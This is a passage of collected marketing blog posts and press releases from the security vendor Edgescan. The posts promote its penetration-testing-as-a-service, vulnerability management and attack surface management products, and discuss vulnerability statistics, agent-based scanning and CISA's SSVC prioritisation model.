management, penetration testing, and attack surface management, underscores the company's commitment to providing effective solutions for today's cybersecurity challenges.  Full article is available online at Forbes >> ### Penetration Testing Done Right Learn why an effective pen testing solution must be a hybrid approach that leverages human intellect, advanced analytics and hard-core automation to effectively manage risk and cyber exposures. Minimizing an organization’s attack surface is an ever-evolving, continuous challenge for security professionals. Testing and securing any, and all, assets facing the public internet, including public clouds, private clouds, data centers and more, can be a daunting and never-ending task. An effective strategy must include penetration testing, vulnerability management, and attack surface management tools at a minimum, combined with a thorough incident response and remediation process. Without any one of these key components – the strategy is “weak,” to say the least. Let’s look at the first component of this strategy: penetration testing.    What is Penetration Testing? Penetration testing or “pentesting” is an established security best practice to find exploitable vulnerabilities and unintentional data exposure within an enterprise infrastructure. While a myriad of pen testing tools from various vendors provides this capability, the technology and its use have evolved significantly in recent years. Now security teams should consider Penetration Testing as a Service (PTaaS) to deliver these essential security measures.   So, what exactly is PTAAS? PTAAS helps organizations better manage security risks, mitigate data breaches, and increase safe business continuity by leveraging a hybrid model that utilizes human intellect coupled with automation and analytics. Delivered as a service to offer greater scale, agility, and risk awareness, this type of assessment is essential for maintaining compliance with industry regulations and security frameworks within hybrid environments.  Edgescan’s PTaaS solution does just that. It combines proprietary penetration testing tools, risk-rated vulnerability data, and human intervention, so that enterprises can adopt PTaaS to harden their attack surface regardless of the size or configuration of their multi-cloud or hybrid environment.   PTAAS is nothing new, as a matter-of-fact Edgescan has been providing this service since 2016... and it is a fundamental solution of our platform.   How does PTAAS Work? Effective PTaaS are a hybrid solution that combines the automation with human assessment, while integrated with advanced vulnerability management and analytics. PTaaS can be used for web application security, APIs, cloud assets, and network devices utilizing risk rating methodologies to prioritize remediation.    Edgescan Penetration Testing as a Service PTaaS is a key component of our Edgescan Platform and is based on over seven years of technology and service evolution. The platform employs several risk scoring systems (i.e., CVSS, CISA KEV, EPSS) and our own Edgescan Validated Security Score (EVSS) to risk-rate results, with the goal of identifying and correcting any vulnerability - unknown, known, exploitable or otherwise.     The Edgescan PTaaS solution utilizes our security team’s extensive technical expertise as well as the entire suite of applications within the Edgescan platform to provide vulnerability assessment, exposure validation, and risk ratings. Our security experts offer battle-hardened security experience combined with countless industry accreditations such as CREST, OSCP, and CEH, to provide clients with deep wisdom and insight to readily resolve their security needs.  Edgescan is focused on testing sensitive areas of an asset and testing for vulnerabilities that cannot be uncovered through traditional vulnerability scanning alone. This hybrid penetration testing process of automation and combined human intelligence is what differentiates us from automated testing tools, scanning tools, and legacy services providing real and actionable results. Retesting of vulnerabilities is included to help ensure fixes are robust and resilient.   Extending Beyond PTaaS with Vulnerability Management and EASM A Unique Multi-Layered Approach that Differentiates Edgescan from Tools and Stand Alone Solutions As I referenced earlier, a major advantage that Edgescan offers customers is that PTaaS is integrated into the overall Edgescan platform that includes five essential security technologies, including Risk-based Vulnerability Management (RBVM), External Attack Surface Management (EASM), as well as Web application, and API Testing. All of these technologies use a common extensive data lake and an intuitive user interface, advancing vulnerability intelligence and simplifying operations and training. The “full stack” intelligence we garner by the combination of these tools is unparalleled in the industry and helps our customers manage their security posture. Competitive solutions offer the above capabilities in a piecemeal, disparate fashion that only makes VM more difficult and error prone for their customers. So, I recommend the Edgescan multi-layered approach with integrated pentesting and vulnerability management:   EASM – What is exposed? What can be potentially hacked? First, accurately detect and assess your entire attack surface, including cloud services, hosts, network devices, web apps APIs and more. VM – What weaknesses do we have? Then continuously monitor and detect all vulnerabilities and exposures across the full stack with high accuracy (Validation is King). Rank them by business concerns and tightly integrate with support operations to ensure timely remediation on what matters most. PTaaS – How would a skilled attacker can do to penetrate your environment? Now that your security team is armed with EASM and VM intelligence, perform laser-focused resilience tests on 1) areas of concern; 2) complex areas not suitable for automated testing (e.g., business logic) to determine the validity of any potential issues. Schedule a demo >> Click here to learn more about Edgescan and how it can secure your environment. ### APIs: The New “Silent Killer” Why You Should Take Preventative Measures Now to Reduce Risk Through Unsecure APIs High blood pressure is known as a “silent killer” because most people never felt like there was an issue before they suffered a cardiac event. APIs are similar in that most enterprises don’t realize that they have gaps in coverage until it’s too late. Cybersecurity professionals need to treat API security just like high blood pressure would be treated. Namely, the best way to prepare yourself is to familiarize yourself with your risk and take proactive choices to mitigate that risk. For hypertension that means getting a baseline set of vitals understanding your family history; perhaps switching to turkey and reducing the consumption of red meat. For your organization’s APIs, that means identifying APIs and then proactively scanning for vulnerabilities. When an API attack occurs most organizations are unprepared because: they didn’t know they needed to secure them, they attempted to secure their APIs but they treated them like Web Applications, or they simply lacked complete visibility to all their APIs. These issues emphasize the urgent need for taking a two-pronged approach to API Security Testing.   Unseen Threats: The Silent Predators The most serious cybersecurity risks are increasingly coming via these “silent killers”.  This makes sense since a higher percentage of web traffic is going through APIs as recently discussed in Jyoti Bansal article published by Forbes “APIs account for over half the internet traffic in many countries.”1 Hidden risks such as the misconfiguration of cloud services and shadow IT can leave the back door wide open for attackers.   Enter Edgescan: Making the Invisible, Visible You simply can’t defend what you don’t know about. The “first step in API security is to discover and catalog all the APIs in your applications. This can be a complex task, as APIs are constantly added and updated.”2 The Edgescan Platform is a hybrid that combines automation, analytics, and human intelligence. Our newly released - External Attack Surface Management solution scans your entire digital footprint and global IT ecosystem including on-premises and cloud-based systems, eliminating any potential gaps in coverage. Edgescan EASM is a great tool to expose any “silent killers” waiting in the lurch. By constantly monitoring your digital estate, Edgescan’s EASM performs continuous asset profiling, discovers Shadow IT, and provides remediation strategies to mitigate the associated risks. EASM provides full visibility across your public cloud, ensuring that any misconfigurations are promptly detected and rectified.   Keeping Up with the Changing Landscape Edgescan’s Full Stack Vulnerability Management (FSVM) solution ensures that vulnerabilities are verified, triaged, and remediated effectively. As the cybersecurity landscape evolves, so too does the protection provide by the Edgescan platform. The Edgescan platform delivers validated vulnerability data that is rated for severity using the Edgescan Validated Security Score (EVSS). In addition, discovered vulnerabilities have the following risk-based data to help you prioritize risks: EPSS (Exploit Prediction Scoring System), CISAKEV (CISA Known Exploited Vulnerability catalogue), CVSS (Common Vulnerability Scoring System).   Forbes also recommends that to ensure API security organizations need to “implement common-sense policies to minimize risk.”3  This means scanning your APIs and performing penetration testing on a regular cadence, with the ability to perform ad hoc testing as well. It is vital to ensure that your APIs “should never expose more data than what is necessary to service the user,”4 and the most trusted method to determine whether that API can be abused is still a penetration test. In the terms of cybersecurity, these APIs’ potential as “silent killers” is just now starting to be realized. That's why Edgescan is committed to shedding light on these threats and providing a comprehensive solution to protect your organization.  We are here to help illuminate and eliminate your cyber risk when it comes to securing APIs, or any part of your infrastructure. Conclusion As we navigate this ever-evolving digital landscape, it is crucial to stay informed and well-equipped against emerging threats. If you have any questions about how Edgescan can bolster your cybersecurity strategy, don't hesitate to get in touch with us.   References 1, 2, 3, 4: Jyoti Bansal, Your Biggest Cybersecurity Threat Is Something You’ve Never Heard Of, Forbes, March 2023 https://www.forbes.com/sites/forbestechcouncil/2023/03/30/your-biggest-cybersecurity-threat-is-something-youve-never-heard-of/?sh=5752da6764c ### How Deploying an EASM Solution Strengthens your Security Posture As you may recall, a few months ago I discussed how Edgescan EPSS and CISA KEV mapping tools help with vulnerability prioritization and risk mitigation. I described our Risk-Based Vulnerability Management (RBVM) solution that is designed to uncover weaknesses and exposures across the enterprise and provide breach predictability of each vulnerability. As a continuation of this topic and following up on my statement that we are always developing tools to help you better prioritize and resolve risk in your hybrid IT environments, I’d like to introduce our new External Attack Surface Management Solution.   Let’s Start with the Basics about EASM What is EASM? EASM is designed to solve a specific problem due to enterprises increasingly moving faster with hybrid, multi-cloud IT deployment and change. This problem is amplified when clouds are commonplace, and deployment is fast and furious. With this rapid time-to-market and quick deployment of new features comes increased risk: an organization’s IT footprint and attack surface increases and evolves. As enterprise infrastructures change and evolve over time, effective cyber security typically does not keep pace. This is exemplified with systems being deployed that are unknown, not maintained or monitored or unauthorized.  A larger attack surface, in theory, requires more resources and processes to secure while presenting a higher chance of weaknesses going undiscovered. This results in a higher probability of breach. Why deploy EASM? In my experience most breaches are not “complex” or exotic but rather due to simple weaknesses in systems because of them being overlooked and vulnerabilities not being mitigated. In most cases, vulnerabilities are not mitigated because the cyber team did not know the system existed in the first place. EASM is a key product in the Edgescan platform that ‘investigates’ your organizations’ presence on the Internet to help discover known and, more importantly, unknown, deployed systems, servers, websites, API’s and applications. This results in a bill of materials addressing questions like “what assets do we have facing the Internet?”; “what is our exposure to public/unauthorized access?” Without specifically understanding the answers to these questions, you leave your organization at risk. Why Use Edgescan EASM? The Edgescan platform is the key to our advantage in the security threat mitigation industry. By integrating our strong PTaaS (Penetration Testing as a Service), with our RBVM and EASM solutions, and utilizing a common, extensive data lake, Edgescan keeps you readily informed of your enterprise-wide security posture as it changes, resulting in Continuous Threat Exposure Management (CTEM). No other offering on the market matches the breadth and depth of our integrated vulnerability prioritization and risk management solutions. How is Edgescan EASM different? Edgescan is the industry leader in PTaaS and full stack RBVM, which provides our clients with an abundance of validated security metrics in terms of coverage, prioritization, MTTR and historical audit logs of a system’s cyber security lifecycle. By combining EASM with PTaaS and RBVM, the Edgescan platform can inform you in a single, unified view, of what systems are under cyber management, what level of rigor (depth) is being applied, and more importantly, which of the discovered systems are not undergoing cybersecurity posture assessment, ala your “blind spots”. Key features of the Edgescan EASM include the following: Discovery of unknown systems deployed on the public Internet Subdomain enumeration and shadow IT enumeration API discovery Service discovery and exposure alerts  Mapping across RBVM / PTaaS and discovered assets Unlimited investigations on demand Native cloud integration for continuous ASM Integrated with the Edgescan platform you get penetration testing as a service and risk-based vulnerability management – so you have continuous threat exposure management (CTEM) across your multi-cloud environment.  With this new addition to our Edgescan platform, we extend our leadership in helping enterprises of all sizes continuously discover, monitor, and secure their evolving IT infrastructure. For more information on EASM, check out our product details here >> https://edgescanstage.wpengine.com/the-platform/attack-surface-management/ ### Press Release: Edgescan Releases Innovative External Attack Surface Management Solution Edgescan's EASM Offering Provides Unprecedented Visibility and Continuous Monitoring to Optimize Enterprise SecurityDUBLIN – JUNE 20, 2023 – Edgescan, the first-fully integrated cybersecurity platform, announced today the release of its new External Attack Surface Management solution, offering unprecedented visibility and continuous monitoring to help secure organizations of all sizes.Today’s enterprises require a cloud-savvy security solution that effectively inventories, monitors, manages and protects their corporate assets across their digital footprint. Traditional ad hock approaches and laborious, manual processes, combined with legacy tools make the process complex, expensive, and ‘false positive’ prone due to human error. An essential way to gain complete visibility and control across a multi-cloud IT environment requires an External Attack Surface Management (EASM) solution that uses a hybrid approach; a solution that provides automated risk-based vulnerability intelligence coupled with incident validation that leverages cyber analytics and human expertise.“Edgescan’s unique hybrid approach combines EASM with its award-winning PTaaS (Penetration Testing as a Service) and RBVM (Risk-based Vulnerability Management) solutions, providing organizations with an optimal view of risks and exposures, understanding exactly what assets exist and what level of security coverage is being applied” says Eoin Keary, Founder and CEO of Edgescan. “The outcome is detailed, actionable and validated vulnerability intelligence that provides risk prioritization for faster remediation and coverage assurance.”The Edgescan EASM solution solves the lack of visibility and slow remediation response challenges presented by legacy tools and manual processes; making it a cornerstone of any modern-day cybersecurity strategy. Integrated with Edgescan Penetration Testing as a Service (PTaaS) and Risk-based Vulnerability Management (RBVM) capabilities, EASM provides complete visibility and assessment across multi-cloud and on-premises infrastructures allowing organizations to see and effectively secure their critical assets and applications. The solution provides the flexibility for organizations to easily modify their change management and deployment models whenever needed, to suit their business needs. Key capabilities of the Edgescan EASM solution include mapping, discovery, and inventory tracking of known DNS and, most importantly, unknown, internet systems; exposing shadow IT and discovering and enumerating subdomains; customizable alerting and reporting of discovered anomalies and exposures; and more. The overall benefits help security teams confidently discover and understand the security of their hybrid environments with continuous, proactive monitoring, while optimizing incident response and remediation.  About EdgescanEdgescan is the first fully integrated cybersecurity platform that unifies all required security solutions into a single combative platform. These solutions include penetration testing as a service (PTaaS), full stack vulnerability management (FSVM), dynamic application security testing (DAST), external attack surface management (EASM), and API security testing. All vulnerability information gleaned from any assessment or test is added to a growing collection of intelligence that is stored in our data lake and shared amongst the solutions. The platform enables companies to view and map assets across their entire global attack surface and delivers validated vulnerability data eliminating false positives. The platform reduces the complexity and overhead associated with tool proliferation, speeds up remediation, cuts operational costs, while reducing risk associated with digital transformation and cloud deployments.Christine CarrigSenior Vice President, Global MarketingEdgescanpr@edgescan.com ### Automation Vs. Talent: Cybersecurity Showdown Which type of security assessment provides the most accurate and dependable results?You should certainly expect when a security assessment is delivered that the majority of security vulnerabilities and hopefully all critical and high-risk weaknesses will be identified at the time of testing. This is a fair ask.When a threat actor goes poking around your systems you can be sure they are doing the same, looking for an easy “way in” so they breach and pivot within your system with an aim to compromise. So, what is the best approach when it comes to visibility and accuracy?Assessment options fall into two recognized categories with a third I would like to present for consideration:Two Recognized Categories1. Automation – Software testing tools2. Manual Assessment - Combination of tools, scripts, and human expertise. A solution to consider: Hybrid Solution – Automation + Human Intelligence + Analytics  Option 1:Automation/Software Testing Tools Option 2:Manual Assessment  Option 3:Hybrid Solution StrengthsScale/Volume,  On-demand, DevOps friendly (speed),  Continuous,  Cost effective Logical issue detectionAccurate / (should be) False positive freeComplex exploit detection, human curiosity (never underrate this.  Contextual awareness (aids priority of remediation. Complex issue detection Logical exploits discovery False positive free / accurate Prioritized   Scale/volume, On-demand,   DevOps friendly,  Coverage, metrics, supportWeaknesses Accuracy and Risk Rating Priority Coverage Depth (Logical vulnerabilities)  Requires expertise to validate output Not scalable Expensive,  Not on-demand,  Does not fit with DevOps etc.  Point-in-time scan.  No Metrics??! Not 100% automated?  Option 1: Automation/Software testing softwareStrengths:Scale/Volume,On-demand, DevOps friendly (speed),Continuous,Cost effective.Weaknesses:Accuracy and Risk Rating,Priority,Coverage,Depth (Logical vulnerabilities),Will always requires expertise to validate output. Option 2: Manual assessment of a systemCoupling of usage of human intelligence, tools, scripts and expertise.Strengths:Logical issue detection,Accurate / (should be) False positive free,Complex exploit detection, human curiosity (never underrate this),Contextual awareness (aids priority of remediation).Weaknesses:Not scalable,Expensive,Not on-demand,Does not fit with DevOps etc,Point-in-time scan,No Metrics?! Option 3: Hybrid Solution – Augmented with ExpertiseStrengths:Complex issue detection,Logical exploits discovery,False positive Free / AccuratePrioritizedScale/Volume, On-demand,DevOps friendly,Coverage, Metrics, Support. The Shoot OutAutomation and Testing Tools Vs. Manual AssessmentFor the point of this article let’s talk about options 1 & 2 above. If I talked about option 3 it might turn into a sales pitch as that is what Edgescan delivers and its worthy of a blog post on its own.We launched our 2023 Vulnerability Statistics Report which is compiled using data from thousands of vulnerability assessments and penetration tests over the past 12 months (to December 2022). One of the areas we focused on was evaluating results from an “automation Vs manual” standpoint and then mapped which “high and critical severity vulnerabilities“ were more than likely detected using automation vs. which require human know-how.The results are interesting in that automation tools (Scanners/DAST) detected 69% of the known critical and high severity vulnerabilities but missed the other 31%.In my 20 years’ experience the best (and most fun) vulnerabilities are related to poor authentication, poor authorization, or broken business logic.I’ve personally breached and compromised entire banks, ministries of finance and global enterprises via poor authorization and authentication controls. Both of which are not easily detected via automation.“Authorization is contextual; it is based on both the model and business process, which is unique per organization. Because of this, it is not a good candidate for automated assessment as tools don’t understand risk or context.” We decided to do this as a “thought leadership” exercise to convince folks that reliance on software-testing-software for vulnerabilities does not work alone – it’s like buying a shiny new electric drill. We are really buying the holes it makes and to make nice holes we need a competent user. The drill alone does not do very much.The same is true when we conduct a cyber assessment – what we should really care about is the output it delivers, and does the approach to getting to that result provide reasonable assurance?High and Critical Severity Vulnerabilities typically not found by automation:Account Hijack vulnerability Malicious File Upload Bypass Client-Side Controls Meta data found in files Bypass Security Question Meta data in PDF Concurrent Logins Permitted Multi Factor Authentication Not Enforced Error Handling (complex variants) Password Policy Not Enforced Server-Side Excessive Permissions / Authorization weakness Password Reset Token Not Invalidated Hard-coded Credentials (various) Security Question Not Enforced Information Disclosure (Contextual) Session Fixation Insecure Binary Code Functions Session Hijacking Insecure password change functionality Unauthenticated Access to Sensitive Resource Insufficient Authorization Unrestricted File Upload Lack of anti-automation User Enumeration Lack of Multifactor Authentication Weak Password Policy  Conclusion:From the data (pictured in the chart and table above) we can see that over 30% of high and critical severity vulnerabilities are not detected using automation alone. Sure, we can run automated cyber security assessments quickly, its costs relatively little (apart from the expertise to validate and prioritize the discovered issues) but we’re looking at attack surface blind spots amounting to circa 30% of all potential vulnerabilities to be discovered.Automation alone, on average, only discovers 69% of all vulnerabilities.We have a 31% coverage blind spot with automation alone. ### Press Release: Edgescan Releases 2023 Vulnerability Statistics Report Revealing 33% of Vulnerabilities Discovered in 2022 were High or Critical Severity DUBLIN – MARCH 8, 2023 – Edgescan, the first-fully integrated cybersecurity platform, announced today the release of its 2023 Vulnerability Statistics Report. The vulnerability data analyzed was collected from thousands of security assessments and penetration tests performed on millions of assets, utilizing the Edgescan Platform in 2022. Register for the report by accessing the 2023 Edgescan Vulnerability Stats Report. The eighth edition of the report provides a statistical model of the most common weaknesses faced by enterprises to enable data-driven decisions for managing risks and exposures more effectively. The statistical models are split across layers of the technology stack such as Web Application, API, and Device/Host layers. Additionally, we make a distinction in the data for four tiers of business sizes based on employee count and a distinction between internet facing and internally facing assets. “We are still not getting the basics right; In 2022 we’ve observed many very basic vulnerabilities, many of which are commonly leveraged by cybercrime. Continuous assessment, validation & prioritization will make a huge difference to any organization’s cybersecurity posture. All vulnerabilities are not created equal, and we must focus on what matters to protect our respective organizations and businesses,” said Eoin Keary, Founder and CEO of Edgescan.   The report provides insight into how quickly vulnerabilities are being fixed based on risk. Unfortunately, high rates of known types of risk are still being found (i.e., patchable) exploitable vulnerabilities, with working exploits in the wild being used by nation states and cyber-criminal groups against organizations who are slow to patch. Non-internet facing systems have a significant risk density resulting in an easy time for criminals once the network perimeter is breached Mean Time to Remediation (MTTR) for Critical Severity vulnerabilities is 65 days 33% of all vulnerabilities across the full stack discovered in 2022 were either High or Critical Severity The most common application layer and API vulnerabilities are still Injection related 13.5% of vulnerabilities in an enterprise’s backlog are either high or critical severity 12% of all Risk accepted vulnerabilities in 2022 were considered (in isolation) Critical Severity New in this report is the way Edgescan looks at prioritization and risk scores. Since Edgescan employs several risk prioritization scoring mechanisms we take a deeper look at the most common risks faced by organizations and look at correlation of the various risk scoring methodologies. Methodology of Data Collection All vulnerability data analyzed for the Edgescan Vulnerability Statistics Report was collected from thousands of security assessments and penetration tests performed on millions of assets; this growing collection of intelligence is stored in our data lake and is used for analytics-based validation purposes amongst the solutions that comprise the Edgescan Platform. Vulnerability data was sourced from over 250 companies of various sizes, Fortune 500 to medium and small businesses, across 30 industry verticals. About Edgescan Edgescan is the first fully integrated cybersecurity platform that unifies all required security solutions into a single combative platform. These solutions include pen testing as a service (PTaaS), vulnerability management, dynamic application security testing (DAST), external attack surface management (EASM), and API security testing. All vulnerability information gleaned from any assessment or test is added to a growing collection of intelligence that is stored in our data lake and shared amongst the solutions. The platform enables companies to view and map assets across their entire global attack surface and delivers validated vulnerability data eliminating false positives. The platform reduces the complexity and overhead associated with tool proliferation, speeds up remediation, cuts operational costs, while reducing risk associated with digital transformation and cloud deployments. Excerpt: The Eighth Edition of the report delves into Risk Density, Mean Time to Remediate (MTTR) critical vulnerabilities, and the convergence of vulnerability management and penetration testing output. ### 5 Reasons Why Agent-Based Scanning Can’t be Your Only Defense As a baseline security prevention, agent-based scanning has become the norm for organizations that have WFH and BYOD policies. Because the endpoints for most organizations are on different networks it would be impossible for a network-based vulnerability scanner to have the capability of simultaneously scanning them. While agents serve a vital role in providing security for specific end points, they cannot be the end-all solution for effectively managing vulnerabilities and remediation processes and here is why: The agent-based scanning approach has five areas of concern: Deployment and Maintenance is Time Consuming and Labor Intensive: Installing agents on every device can be time-consuming and resource intensive. Updating those agents once they are installed is an arduous task. Remediation Prioritization is Challenging Due to Accuracy Issues: Agent-based scanners tend to produce a more detailed view of the vulnerabilities present in a specific system. Despite the detail, these agent-based scans tend to produce a high number of false positives and negatives, which can make it difficult to identify and prioritize true vulnerabilities that need remediation. The End Point Itself Becomes a Threat Vector: Agent-based scanners can also be targeted by attackers, as they represent a point of entry into the system, which could lead to a compromise of the entire network. Slows Down Performance: Agent-based scanners are resource heavy and might impact the performance of a system or device it’s installed on. Opens-up Compatibility Issues: IoT devices and specialized hardware on your network might be using an operating system that is unsupported by an agent. These devices will have an IP address though, enabling them to be scanned by a network-based scanner.     Agent-based scanning is a decent tool to defend certain endpoints, but it simply cannot scale and is not an effective solution for organizations that require large-scale vulnerability scanning and vulnerability management. Not to mention most scanners create a lot of noise and a security team beleaguered by false positives is unable to properly rate risk, remediate vulnerabilities, or keep their security posture in good standing. Breaches most often occur in public-facing assets, with “web applications [being] the number one vector.”1 As Verizon points out, this fact highlights the value of continuously scanning public-facing assets, as these are the most used entry points for attackers. The performance impact of continuous agent-based scanning is quite significant when compared to the lighter touch of network-based vulnerability scanning. It’s important to employ agentless scanning alongside agent-based scanning to improve accuracy and breadth of coverage, while being conscious of your enterprise’s resources. Verizon has coined the phrase “opportunistic attack sales funnel” to describe what has become best practice amongst bad actors and I think it is an accurate process description “[Hackers] start with scanning for IPs and open ports… then crawling for specific services… then testing for specific Common Vulnerabilities and Exposures (CVE)… [finally attempting] Remote Code Execution (RCE) to gain access to the system.”2   Think like an attacker and defend like one too A network-based vulnerability scanner would more accurately emulate the workflow that most hackers are using, as described above. However, the Edgescan platform utilizes a hybrid approach that combines automation and expert validation from CREST/OSCP-certified pen testers. After all, hackers are humans, and it is important to use a similar combination of automation and human intelligence that they employ to monitor and safeguard your company assets – Edgescan's hybrid approach to vulnerability management and penetration testing as service (PTaaS) provides that perspective. See how we do it. Sign up for a demo today! Sources: 1. Verizon Data Breach Investigation Report, page 15 2. Verizon Data Breach Investigation Report, page 31 https://www.verizon.com/business/resources/T208/reports/dbir/2022-data-breach-investigations-report-dbir.pdf Excerpt: Agent-based scanning is a decent tool to defend certain endpoints, but it simply cannot scale and is not an effective solution for organizations that need large-scale vulnerability scanning and management. ### The SSVC model will be challenged as a risk-rating system for industrial scale vulnerability prioritization due to required contextualization Recently Edgescan deployed two tools to help with risk prioritization, namely, EPSS and CISA KEV mapping. Both can be combined with CVSS and EVSS (Edgescan Validated Security Score) to help prioritize vulnerabilities across our client’s estates. As always, we are working on a few more tools to help with prioritization and we will formally announce them as they roll out. Another model I would like to introduce for consideration is the SSVC. What is SSVC? Another model used to prioritize vulnerabilities is the CISA SSVC (Stakeholder-Specific Vulnerability Categorization). SSVC is a customized decision tree model that assists in prioritizing vulnerability response, and it is currently being used by the United States government and their Agencies. The goal of SSVC is to assist in prioritizing the remediation of a vulnerability based on the impact successful exploitation would have. Check out the SSVC guidelines. I find that the SSVC model looks very promising. The SSVC model is based on a number of environmental attributes associated with the discovered vulnerability as follows: (State of) Exploitation: Evidence of active exploitation of a vulnerability Does a publicly available proof of concept (PoC) exist, is it actively being exploited? If no PoC exists is there reliable evidence it is being exploited? Technical Impact: Technical Impact of exploiting the vulnerability Similar to severity on CVSS and is split into “partial” or “total” impact. “Total” means the impact will provide the attacker total control of the component being attacked. Automatable: Can an attacker rapidly cover an organizations estate and commit widespread attacks Can the exploit be automated? This obviously beings speed and scale into account. Its considered not automatable if Steps 1-4 of the kill chain—reconnaissance, weaponization, delivery, and exploitation—cannot be reliably automated for this vulnerability. This also has a contextual aspect in terms of vulnerability chaining (combining vulnerabilities) and the context in where the vulnerability is present. Every system is different and there may be compensating controls (e.g. multifactor authentication) which would prevent automation of the exploit. Mission Prevalence: Impact on mission essential functions of relevant entities In CISA terms; “A mission essential function (MEF) is a function “directly related to accomplishing the organization’s mission as set forth in its statutory or executive charter.” To me this means if this system was compromised would is affect my organisations “mission”? Could by business still operate? Will it adversely negatively affect my business if a given system was taken over? This is highly contextual and is related to DR (Disaster Recovery) and BCP (Business Continuity Planning) plans determining the importance of a system to an organization. Public Well-Being Impact: Impacts of affected system compromise on humans A corner stone to information security but often overlooked and rarely discussed in most organisations. Would the exploit put folks in peril? Certainly, a case-by-case contextual decision. Mitigation Status: Status of available mitigations, workarounds, or fixes for the vulnerability Mitigation status measures the degree of difficulty to mitigate the vulnerability in a timely manner. We examine if there is a workable mitigation for the exploit. Certainly, this is contextual and unique to each organisation as everyone is different. Once all this metadata is compiled per vulnerability a decision can be made based on a decision tree documented here: https://www.cisa.gov/sites/default/files/publications/cisa-ssvc-guide%20508c.pdf Figure 1. Decision Tree Representing Vulnerability Prioritization (Referenced from SSCV Guidelines) This results in a decision to “track”, “track*”, “attend” or “act.” An act being the most proactive (fix the issue ASAP). Overall, this is a very clever and simple model. But there are challenges when it comes to enterprise/high volume vulnerability management: We need to bare in mind that risk is contextual, and rightly so. But we don’t always value, store and leverage contextual data enough to become effective: Lots of metadata is required to formulate a decision which is possible but difficult to catalogue. Lots of this metadata is contextual based on where a vulnerability s discovered. Items such as a systems mission prevalence, public well-being impact and even if the exploit is automatable when kill chains are considered. This model is super effective for a company which has the required contextual information at hand and at scale in terms of enterprises. From experience this is more often not the case. Effective widescale use of this model would require both DR (Disaster Recovery) metrics, identification of AAA systems/components across the enterprise. Simple items such a SBOM (Software Bill of Materials), threat modelling (to discuss mitigations) and a missions critical asset inventory would be required for this to be effective across the enterprise. Storing and utilising machine-readable metadata containing both business and technical attributes of end-to-end systems across the organization would be required to make this effective. Overall, my conclusion circles around the fact that risk is contextual, and we it would be rare to store and provide adequate meta/attribute data to automate SSVC. Automation of frameworks such as SSVC is how we all can win, but it is an uphill battle…     Excerpt: The SSVC model will be challenged as a risk-rating system for industrial scale and vulnerability prioritization due to required contextualization ### Press Release: Edgescan Illuminates and Eliminates Public Cloud Risk with the Release of Cloudhook New cloud native integration provides unprecedented risk visibility with the ability to monitor cloud assets and their security posture in one unified platform. DUBLIN – MARCH 1, 2023 – Edgescan, the first-fully integrated cybersecurity platform, announced today the release of Cloudhook for cloud native environments. The Cloudhook integration feeds location data (IPs and hostnames) into the Edgescan platform and leverages both the external attack surface management (EASM) and vulnerability management components to illuminate and eliminate risk. As a cloud endpoint changes, Edgescan keeps pace with the evolving environment. The modern cloud attack surface is ephemeral and in constant flux in order to support business critical infrastructure. The Edgescan platform keeps pace with these changes by ensuring complete visibility across an organization’s global attack surface to eliminate security blind spots. This ensures all IT assets are inventoried and included in security monitoring and testing to build a resilient business posture. “Security tools that dynamically inventory and monitor your assets as your global attack surface expands into the cloud are no longer a nice to have, they are a requirement for robust security programs,” said Eoin Keary, Founder and CEO of Edgescan.     Media Contact: Christine Carrig SVP Global Marketing Edgescan pr@edgescan.com Excerpt: New cloud native integration provides unprecedented risk visibility with the ability to monitor cloud assets and their security posture in one unified platform. ### Buyer Beware:
During a Merger or Acquisition Their Digital Footprint Becomes YOUR Attack Surface When it comes to mergers and acquisitions, it is time turn on the heat and scrutinize corporate security practices I came across an interesting article published by the Wall Street Journal. It discusses how private equity firms have been turning up the heat on cyber security requirements when evaluating mergers and acquisitions (M&A). Because the ramifications of security issues from an M&A target or one of their portfolio companies causes domino effect into the security posture of all their corporate assets. This may not feel like breaking news to those of us in the field, but it does bring attention to the due diligence and tougher requirements that are being set by private equity firms prior to an acquisition, to ensure that their portfolio companies are effectively monitoring their security posture. Simply put, with any acquisition or merger, their security exposures become the acquiring company’s as well.   “Many private-equity firms are taking a similarly serious approach to cyber,” said Chris Stafford, a partner in the mergers and acquisitions group at advisory firm West Monroe Partners LLC, “in part due to the increased visibility of—and responsibility for—cyber risk management at senior executive levels.” Source: https://www.wsj.com/articles/private-equity-firms-tighten-focus-on-cyber-defenses-at-portfolio-companies-11673643373?reflink=desktopwebshare_linkedin     Their digital footprint is your attack surface Today, a company’s digital footprint is universally regarded as a business risk, operationally and financially, by the organization itself and potential investment firms. Not convinced? Look at the evolution of cyber insurance requirements over the past ten years or so. So, where do you start?     You need to see and map your attack surface The first step in evaluating your security posture is understanding your attack surface and knowing exactly where you are publicly exposed. From there, you must determine the risk of each exposure. What would the cost to the business be if a bad actor were to get in through any of those public-facing vectors?   The Edgescan platform maps and continuously monitors your attack surface The first step during a merger or acquisition is to inventory all IT assets and get complete visibility over the organization’s attack surface. The external attack surface management (EASM) component of the Edgescan Platform will provide the security posture of an organization. The platform continuously scans and intelligently maps a company's entire attack surface, identifying exposed services, shadow/lost/forgotten deployments, and rogue/unknown APIs, all without requiring any deployment or configuration. Events can be custom configured to alert on deltas found with ASM and the identified external estate can then be put into a vulnerability scanning cadence. “Due diligence processes today are not just focused on whether a company has the right policies or governance in place. They can now include network scanning and penetration testing, where security specialists attempt to break into systems…” Source: https://www.wsj.com/articles/private-equity-firms-tighten-focus-on-cyber-defenses-at-portfolio-companies-11673643373?reflink=desktopwebshare_linkedin Pen testing should go beyond an automated scan The next logical step in an in-depth evaluation of a company’s security postures is pen testing. Most solutions provide automated penetration testing which is simply a fancy way to say scanning. An effective penetration test should always be a combination of automated scanning and human curiosity to probe the business logic, humans are capable of thinking and executing in ways that cannot yet be completely automated. If you do not have the human eyes and intelligence to evaluate the output, you are simply getting an automated scan.   The Edgescan platform offers a truly differentiated element to pen testing – human expertise Edgescan offers Penetration Testing as a Service (PTaaS),  which is a hybrid solution that combines the breadth of automation with the depth of human assessment. Our hybrid model not only leverages deep security expertise that comes from our technical team, but also the full stack of solutions that are part of the Edgescan platform. Our Smart Vulnerability Management Platform offers continuous vulnerability assessment, manual business logic assessment, vulnerability validation, risk rating and prioritization, remediation guidance, unlimited re-testing, and expert support. Where traditional penetration testing engagements only capture a snapshot in time, Edgescan’s PTaaS provides you with a continuous view of your risk, with the ability to demonstrate you are eliminating that risk. Work smarter, not harder. We have all heard this saying. With the Edgescan platform, you can know the risk associated with any company asset, at any time. See how we do it. Sign up for a demo today! Excerpt: When it comes to mergers and acquisitions, it is time turn on the heat and scrutinize corporate security practices. ### Shift Left is not working….. Over the past decade the “shift left” movement has been gaining traction. The premise is that if we 